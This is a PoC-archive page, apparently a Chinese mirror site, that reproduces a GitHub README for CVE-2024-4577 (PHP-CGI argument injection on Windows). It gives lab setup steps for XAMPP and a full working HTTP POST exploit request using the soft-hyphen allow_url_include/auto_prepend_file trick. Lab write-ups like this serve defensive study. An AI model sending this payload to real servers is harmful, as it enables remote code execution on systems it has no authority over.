Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-4577 PoC — PHP 操作系统命令注入漏洞

Source
https://github.com/AlperenY-cs/CVE-2024-4577
Associated Vulnerability
Title:PHP 操作系统命令注入漏洞 (CVE-2024-4577)
Description:PHP是一种在服务器端执行的脚本语言。 PHP存在操作系统命令注入漏洞,该漏洞源于在特定条件下,Windows系统使用“Best-Fit”行为替换命令行中的字符,这可能导致PHP CGI模块错误地将这些字符解释为PHP选项,从而泄露脚本的源代码,在服务器上运行任意PHP代码等。以下版本受到影响:8.1至8.1.29之前版本,8.3至8.3.8之前版本,8.2至8.2.20之前版本。
Description
Python script for get reverse shell with using CVE-2024-4577
Readme
# CVE-2024-4577 - PHP-CGI Argument Injection RCE

|               |                                          |        |
|---------------|------------------------------------------|--------|
|      CVE      |                Description               | CVSSv3 |
| CVE-2024-4577 | PHP-CGI Argument Injection Vulnerability | 9.8    |
|               |                                          |        |

"CVE-2024-4577 is a critical argument injection vulnerability in PHP that can be exploited to achieve remote code execution (RCE). According to researchers at DEVCORE, this flaw is the result of errors in character encoding conversions, affecting the “Best Fit” feature on Windows." \
-[Tenable](https://www.tenable.com/blog/cve-2024-4577-proof-of-concept-available-for-php-cgi-argument-injection-vulnerability)

## Create lab for CVE-2024-4577
#### Download XAMPP
Download [XAMPP](https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.1.25/xampp-windows-x64-8.1.25-0-VS16-installer.exe/download) (8.1.25 / PHP 8.1.25)
After installing XAMPP, check the php version. It should be 8.1.25. The php version can be checked by running the "php -v" command from the command line. If it gives an error, it should be added to the php [PATH variable](https://www.forevolve.com/en/articles/2016/10/27/how-to-add-your-php-runtime-directory-to-your-windows-10-path-environment-variable/).
#### Set Locale
The locale needs to change. To do this, follow Control Panel > Clock and Region > Region. Set the format to Japanese, Traditional Chinese, or Simplified Chinese. Click on Administrative > Change system locale and select the appropriate locale.
#### Configuring Apache
If PHP does not run in cgi mode, you should make these settings.
- Copy php.exe or php-cgi.exe to /cgi/bin/ folder.
- Add this lines to \xampp\apache\conf\httpd.conf ⬇️
```
ScriptAlias /php-cgi/ "C:/xampp/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"
AddType application/x-httpd-php .php

<Directory "C:/xampp/php">
    Options +ExecCGI
    AllowOverride None
    Require all granted
</Directory>
```
- Go httpd-xampp.conf and find `LoadModule php_module "C:/xampp/php/php8apache2_4.dll"`. Put '#' to the begining of the line.
#### Start Apache
Save changes and start apache instance.
## Exploitation
If the output of the PHP code sent in the body of the POST request below is seen in the response, the exploitation step is successful.
```
POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{HOST}}
User-Agent: curl/8.3.0
Accept: /
Content-Length: 30
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
echo "vulnerable";
?>
```

## Disclaimer⚠️
This laboratory environment is intended solely for educational purposes and should not be used in live environments. I am not responsible for any damages or losses that may occur as a result of improper use. Users must utilize this environment at their own risk.
File Snapshot

 [4.0K]  /data/pocs/302070942ca830c183f8c9b4972607066243bd6e
└── [2.9K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.